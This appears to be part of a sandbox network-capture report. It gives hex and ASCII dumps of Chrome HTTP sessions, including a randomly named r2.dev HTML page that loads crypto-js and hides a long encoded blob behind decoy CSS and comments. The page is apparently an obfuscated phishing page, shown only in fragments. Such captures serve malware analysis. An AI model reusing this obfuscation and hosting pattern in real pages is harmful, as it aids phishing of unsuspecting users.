                                                                                                                                                                                                        2024-08-30 16:16:04 UTC1369INData Raw: f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b fb 99 f8 0f 81 bb d8 fa 8b 4d dd 4f 36 98 bf 17 46 7e 03 e1 6e c7 e9 54 6f 0e 9f ba be 6d b1 5f 73 3f 02 3e 1a ef 64 fd 43 a6 ee b5 53 57 78 a4 37 ba 53 f0 22 6c 5c 85 74 ed dd 35 5f b7 cf b9 d1 2c 4a d7 36 e9 4f 77 c8 a2 6d 5c 87 aa de d2 d3 d7 fb 7c 7a ca e6 d2 7b 35 63 24 97 c8 a6 ab 77 22 97 a7 c7 b1 54 7d b3 cd 38 4a 8d 45 9a 79 48 f1 44 d7 c4
                                                                                                                                                                                                        Data Ascii: Mm{Mm{Mm{Mm{Mm{Mm{Mm{Mm{Mm{MmMO6F~nTom_s?>dCSWx7S"l\t5_,J6Owm\|z{5c$w"T}8JEyHD
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC1369INData Raw: 89 2e d5 a0 ba 17 57 4a 31 0a 6e 54 f3 8b 7d 46 57 4b 63 89 ad ef 0e d1 a7 47 6a 62 25 b9 7a 03 ab 8b 4c 02 ca 9b 95 28 a9 e4 9f 03 60 b1 a3 88 e6 e1 db 4b 6e 5c d4 57 31 12 c8 10 4a 87 a3 1c b2 46 4e 9a 62 39 30 35 5c e2 e7 2b 55 ae 67 c1 17 a9 88 59 aa 98 97 1d 54 a8 d9 77 92 df 81 94 94 a6 53 35 44 2e d3 62 17 14 ea 16 aa aa 25 76 2c c4 2b ca c8 b5 c2 78 74 9c ac 89 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5
                                                                                                                                                                                                        Data Ascii: .WJ1nT}FWKcGjb%zL(`Kn\W1JFNb905\+UgYTwS5D.b%v,+xt<:NVC9Yd8O<:NVC9Yd8O<:NVC9Yd8O<:NVC9Yd8O<:NVC9Yd8O<:NVC9Y
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC1369INData Raw: da 40 e3 36 90 38 cd a4 0e 33 68 64 e3 51 55 de 4f 0c 2d cd 52 85 4a 8c 62 13 e2 4a b4 9b 64 f2 4c 5d 5d 9c 77 71 27 91 37 56 79 2c f7 8c c1 4d 7c d7 29 53 4c a2 aa a3 f4 bd 72 ec 44 62 16 ea 5d 4e 8c b2 cb 34 57 44 67 aa 9b 76 62 e7 39 71 31 9c 16 d7 48 2c a5 0a b0 4e 4d 74 a3 cb aa d2 c5 c8 97 ab 49 ad af 43 72 26 89 6a 1e b7 35 49 56 ce bd 5b 8b 6a 4f 24 db dc 8d 43 53 a3 aa 8a b2 ed db af bd 14 de a2 28 b9 2c 2d 46 a5 4c 36 72 b7 ae 9a 6b 76 f3 cd 54 44 52 dd 6b b9 e3 4c 55 42 f4 54 e3 3e 5a 93 c9 f1 dc 5a b3 38 9c ae cc 45 51 c3 53 2f 6a d3 5a 57 18 0d c5 2a 55 aa 3d 9c f2 de cc e6 9f 59 c1 c9 a4 ef 16 ee d1 a9 a2 6a a6 1b 71 a2 9a 55 6b a4 d6 90 ad 19 c7 6d ae 19 99 cb 3a c8 aa 31 2e 1f b4 b6 4d 7a 5b b3 98 76 2a d3 d9 e0 b7 1e 98 af 89 e2 a6 62 39
                                                                                                                                                                                                        Data Ascii: @683hdQUO-RJbJdL]]wq'7Vy,M|)SLrDb]N4WDgvb9q1H,NMtICr&j5IV[jO$CS(,-FL6rkvTDRkLUBT>ZZ8EQS/jZW*U=YjqUkm:1.Mz[v*b9
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC1369INData Raw: 2d 49 d6 c6 a7 ab 58 5d 55 bb b7 a6 f6 73 6f 72 35 ed 56 8f c3 e6 ef 9b b5 bd 54 5d a2 2d 57 2c 30 eb 56 b4 9c ad aa a6 9a dd bc c3 d7 d7 0d ee 29 a2 e4 78 94 ae d0 a1 e4 cd d7 8b cd f1 22 98 9a 79 bc 5a 9b d3 5c f0 32 3e ad b5 99 75 82 62 54 a1 56 72 54 93 cb 7b 3d fa 3d 74 f1 70 b5 ed bb b0 2d ea 74 f3 54 47 36 e2 68 a6 9b 5a 69 0d ad 39 29 c7 69 a5 d2 6c b6 ef e6 21 c4 36 86 ca b9 a5 aa 79 3b 54 de d2 f4 4c 85 13 13 0c 2c 57 89 c4 ab 4e 5d 65 53 0a e7 12 a4 d3 6f 71 0f 3c cf 35 d8 f0 28 cf 35 d8 e8 91 29 00 00 00 00 00 00 00 00 00 00 00 08 cf d5 62 53 1d 56 2f 39 8d 7f db 7f 42 9a bc b2 b9 6b d4 8f 77 9f 3a d3 f6 ba e7 be cd 1f 5f ea cb e9 4d dd fc 1a 7d 9d 26 f7 a0 f1 c7 56 7e c3 3a ea 1f 9c d3 ed 33 da 07 34 df bf 23 70 a8 73 48 76 1b 3d ae 8e 25 57
                                                                                                                                                                                                        Data Ascii: -IX]Usor5VT]-W,0V)x"yZ\2>ubTVrT{==tp-tTG6hZi9)il!6y;TL,WN]eSoq<5(5)bSV/9Bkw:_M}&V~:34#psHv=%W
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC1369INData Raw: d7 fd b7 f4 29 ab cb 2b 96 bd 48 f7 79 f3 ad 3f 6b ae 7b ec d1 f5 fe ac be 94 dd df c1 a7 d9 d2 6f 7a 0f 1c 75 67 ec 33 ae a1 f9 cd 3e d3 3d a0 73 4d fb f2 37 0a 87 34 87 61 b3 da e8 e2 55 75 97 16 3e b3 26 a4 ae 08 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a ad 9e 92 62 32 b9 4c 66 13 ce 12 dc f8 11 e1 bc 75 4c d3 53 89 56 32 db ca 1c 0b d4 d1 10 f5 46 a2 31 cd cd b6 b7 c9 2d a7 c4 a2 b8 85 a8 bb c5 3c 92 ad 65 06 9b 8b ca 45 34 44 44 aa aa a9 88 cb 8d 1b 59 ae 32 cc bb 55 71 fa 59 a6 f5 59 45 c3 61 ef 2d cd 6b b3 7e 67 92 7f f1 dc 5b ce 54 c5 39 9c ac 6d b5 3d fc 0a a2 17 a2 e7 e9 cb ca 3b 19 ae 25 c8 4c 53 c4 b6 51 52 9a a3 01 08 00 00 00 00 00 00 00 00 00 00 00 0a b5 98 10 c8 8c 09 29 e5 b8 91 4f f9 29 74 a0 7e b0 85 dd aa c5 ad aa 5b d5 82 d8
                                                                                                                                                                                                        Data Ascii: )+Hy?k{ozug3>=sM74aUu>&@b2LfuLSV2F1-<eE4DDY2UqYYEa-k~g[T9m=;%LSQR)O)t~[
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC1369INData Raw: 79 e7 b8 b3 a7 ab 82 a7 97 59 47 8b 6e 69 96 e5 ea 4f 4a 55 ee 15 4a 9d 49 66 f2 e9 66 cd a4 b9 c5 30 e1 9b cf b3 66 dd d9 aa 21 9a 1c b2 8e d7 59 9c a7 a3 47 aa ac 4e 08 cb 68 9a 91 4f 55 5c 77 96 e0 98 e6 9a 59 15 aa 54 00 00 00 00 00 00 00 08 cf d5 62 53 1d 56 2f 39 8d 7f db 7f 42 9a bc b2 b9 6b d4 8f 77 9f 3a d3 f6 ba e7 be cd 1f 5f ea cb e9 4d dd fc 1a 7d 9d 26 f7 a0 f1 c7 56 7e c3 3a ea 1f 9c d3 ed 33 da 07 34 df bf 23 70 a8 73 48 76 1b 3d ae 8e 25 57 59 71 63 eb 32 6a 4a e0 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 e9 b9 c9 35 c0 b7 5d 1c 52 98 8e 4e 54 2b 46 34 67 15 c5 26 5d f0 e6 29 23 35 55 10 d4 6d 74 dd 54 bc c6 e5 6d b4 f2 72 cb 23 5c d6 fd b5 3b 4e ea 4d 16 74 f1 54 b2 76 a2 34 6a 9e 15 6d 1b 87 05 b4 d6 79 e4 7a f6 7c 45 6d 4f
                                                                                                                                                                                                        Data Ascii: yYGniOJUJIff0f!YGNhOU\wYTbSV/9Bkw:_M}&V~:34#psHv=%WYqc2jJ5]RNT+F4g&])#5UmtTmr#\;NMtTv4jmyz|EmO
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC1369INData Raw: f5 ce ef b9 7e 9c 30 7d b7 49 af 4f 99 d0 6f b2 2e a7 bd a9 a1 df 46 5b 66 fa 90 d6 37 9f f0 aa 6f a5 2e 6b 4b b8 be 86 e9 4f 47 ce 37 7d 49 f7 5e 87 04 44 12 3e 25 aa bc c2 48 bc 2a 00 00 00 00 00 00 00 04 67 ea b1 29 8e ab 17 9c c6 bf ed bf a1 4d 5e 59 5c b5 ea 47 bb cf 9d 69 fb 5d 73 df 66 8f af f5 65 f4 a6 ee fe 0d 3e ce 93 7b d0 78 e3 ab 3f 61 9d 75 0f ce 69 f6 99 ed 03 9a 6f df 91 b8 54 39 a4 3b 0d 9e d7 47 12 ab ac b8 b1 f5 99 35 25 70 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 51 da 91 6e b8 cc a2 65 cc b4 86 54 e4 5d 9f 29 3d 61 a9 fa eb a3 c9 69 0b ab 97 09 1a be ba 9f bf 2e bf ba 57 b3 a7 e0 65 2d 4a 62 3e 55 65 08 67 9e 51 32 7b 36 79 35 7d f2 d3 f0 55 35 32 9d f4 f9 18 4a 7c 37 19 5b b5 62 96 81 62 89 aa bc 34 fb 5f 98 a7 29 71 52
                                                                                                                                                                                                        Data Ascii: ~0}IOo.F[f7o.kKOG7}I^D>%H*g)M^Y\Gi]sfe>{x?auioT9;G5%pBBQneT])=ai.We-Jb>UegQ2{6y5}U52J|7[bb4_)qR


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        24192.168.2.54976735.190.80.14436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC514OUTOPTIONS /report/v4?s=VMcD8TIpgo1vLufL0eO%2FLbrmD%2F4y8myg1aFc5fyHOhEzqeqXQ8iwKgrJetqL1cToVrrkUgktt7Cy6v7otpWNf6VA35cycnyf1tkJVPcuEAHp9A%2BXOWTAhUga HTTP/1.1
                                                                                                                                                                                                        Host: a.nel.cloudflare.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Origin: https://pblc.me
                                                                                                                                                                                                        Access-Control-Request-Method: POST
                                                                                                                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        access-control-max-age: 86400
                                                                                                                                                                                                        access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:16:03 GMT
                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        25192.168.2.54976835.190.80.14436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC464OUTPOST /report/v4?s=VMcD8TIpgo1vLufL0eO%2FLbrmD%2F4y8myg1aFc5fyHOhEzqeqXQ8iwKgrJetqL1cToVrrkUgktt7Cy6v7otpWNf6VA35cycnyf1tkJVPcuEAHp9A%2BXOWTAhUga HTTP/1.1
                                                                                                                                                                                                        Host: a.nel.cloudflare.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                        Content-Type: application/reports+json
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC389OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 39 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 32 39 2e 32 33 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 62 6c 63 2e 6d 65 2f 66 61 76 69 63 6f 6e
                                                                                                                                                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":195,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.129.239","status_code":404,"type":"http.error"},"type":"network-error","url":"https://pblc.me/favicon
                                                                                                                                                                                                        2024-08-30 16:16:05 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:16:04 GMT
                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        26192.168.2.549770104.18.2.354436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:13 UTC709OUTGET /OFF13244785676887437647647874876473768.html HTTP/1.1
                                                                                                                                                                                                        Host: pub-e1c6f3d85d51402790227684363ac52c.r2.dev
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:14 UTC282INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:14 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 5989
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        ETag: "b2dfd747819fb3488eebdf2e46befccd"
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 08:26:26 GMT
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb61586ba548cee-EWR
                                                                                                                                                                                                        2024-08-30 16:16:14 UTC1087INData Raw: 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63
                                                                                                                                                                                                        Data Ascii: <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script> <script src
                                                                                                                                                                                                        2024-08-30 16:16:14 UTC1369INData Raw: 29 3b 7d 23 71 75 61 6c 69 66 69 65 72 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 31 33 38 36 34 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 37 30 70 78 3b 7d 23 65 61 67 65 72 6c 79 20 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 77 69 64 74 68 3a 20 31 31 38 70 78 3b 68 65 69 67 68 74 3a 20 31 33 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 33 30 36 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 63 61 6c 2d 62 6f 75 6e 63 65 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d
                                                                                                                                                                                                        Data Ascii: );}#qualifier {width: 130px;height: 40px;background: #113864;margin-top: -70px;}#eagerly {display: flex;flex-wrap: wrap;width: 118px;height: 131px;border-radius: 7px;overflow: hidden;margin: 0 auto;margin-top: -306px;animation: cal-bounce 5s infinite;anim
                                                                                                                                                                                                        2024-08-30 16:16:14 UTC1369INData Raw: 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 36 38 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 2d 31 38 30 64 65 67 29 3b 7d 7d 23 67 61 6c 65 6e 61 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 32 2c 20 30 2c 20 30 2e 36 37 2c 20 30 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 74 6f 70 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b
                                                                                                                                                                                                        Data Ascii: transform: translateY(-68px) rotate3d(1, 0, 0, -180deg);}}#galena {width: 130px;animation: closed-flap-swing 5s infinite;animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);transform-origin: top;transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);
                                                                                                                                                                                                        2024-08-30 16:16:14 UTC1369INData Raw: 72 61 62 62 6c 65 20 67 61 69 6e 65 72 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 61 62 62 6c 65 20 70 61 62 6c 75 6d 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 61 62 62 6c 65 20 69 63 65 62 72 65 61 6b 65 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 71 75 61 6c 69 66 69 65 72 22 3e 3c 2f 64 69 76 3e 20 3c 21 2d 2d 20 3c 73 70 61 6e 3e 44 72 69 76 69 6e 67 20 69 73 20 61 20 64 69 61 6c 6f 67 75 65 20 62 65 74 77 65 65 6e 20 74 68 65 20 72 6f 61 64 20 61 6e 64 20 74 68 65 20 64 72 69 76 65 72 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 61 70 68 74 68 61 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 61 63 61 72 61 6e 64 61 22
                                                                                                                                                                                                        Data Ascii: rabble gainer"></div><div class="rabble pablum"></div><div class="rabble icebreaker"></div></div></div></div><div id="qualifier"></div> ... <span>Driving is a dialogue between the road and the driver.</span> --><div id="naphtha"><div class="jacaranda"
                                                                                                                                                                                                        2024-08-30 16:16:14 UTC795INData Raw: 7a 4e 6a 41 33 5a 47 49 79 4d 54 6b 35 4d 57 51 32 4e 7a 51 34 4d 54 4a 6c 5a 54 4a 6d 4e 57 45 7a 4d 32 55 30 4e 6d 59 33 4e 6a 6b 35 4e 7a 59 7a 4d 54 49 30 4f 47 51 35 4e 7a 49 7a 4e 44 4d 78 5a 57 4a 6b 4f 47 52 6b 5a 6a 59 32 5a 57 51 77 4d 57 46 6b 4d 6d 59 35 4e 7a 49 30 4f 54 4d 7a 4d 54 55 30 59 6a 6c 68 4e 57 52 6b 5a 54 59 35 4e 32 56 6a 4e 7a 51 32 4d 57 45 32 4d 54 6b 35 4e 32 49 31 4d 32 51 32 4e 7a 59 31 4f 57 4e 69 5a 47 5a 6c 5a 44 4a 68 59 7a 41 79 4f 44 67 35 4e 6a 56 69 4e 32 59 31 4f 47 49 79 4e 6a 59 77 4e 32 55 78 4e 47 51 30 59 54 51 30 4d 6a 59 34 4e 6d 59 32 59 54 56 69 4d 6a 55 77 4e 7a 42 6d 59 6d 45 31 5a 54 46 6a 4f 47 59 79 59 57 49 78 4d 44 4d 33 59 32 49 7a 4d 7a 6b 77 4d 47 4d 31 59 7a 49 35 5a 57 51 31 5a 47 46 6c 4f 44
                                                                                                                                                                                                        Data Ascii: zNjA3ZGIyMTk5MWQ2NzQ4MTJlZTJmNWEzM2U0NmY3Njk5NzYzMTI0OGQ5NzIzNDMxZWJkOGRkZjY2ZWQwMWFkMmY5NzI0OTMzMTU0YjlhNWRkZTY5N2VjNzQ2MWE2MTk5N2I1M2Q2NzY1OWNiZGZlZDJhYzAyODg5NjViN2Y1OGIyNjYwN2UxNGQ0YTQ0MjY4NmY2YTViMjUwNzBmYmE1ZTFjOGYyYWIxMDM3Y2IzMzkwMGM1YzI5ZWQ1ZGFlOD


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        27192.168.2.549771104.17.24.144436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:14 UTC589OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:14 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:14 GMT
                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                                                                                                                        ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                        Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Age: 123266
                                                                                                                                                                                                        Expires: Wed, 20 Aug 2025 16:16:14 GMT
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNxBt%2BnvlXFQ0NdmCGNvtrnZJX%2FmHhz3lguiPZ6f4dZXw97D191PZJN0QTf4el%2FBzhreYhb9uFb5uz5YZMaALbMnkiN0Wr%2FFG6ZV5C%2BdLsASwyDYMtYDK2%2FhNR0R7rbHkouWwdte"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb6158c0a5b4271-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
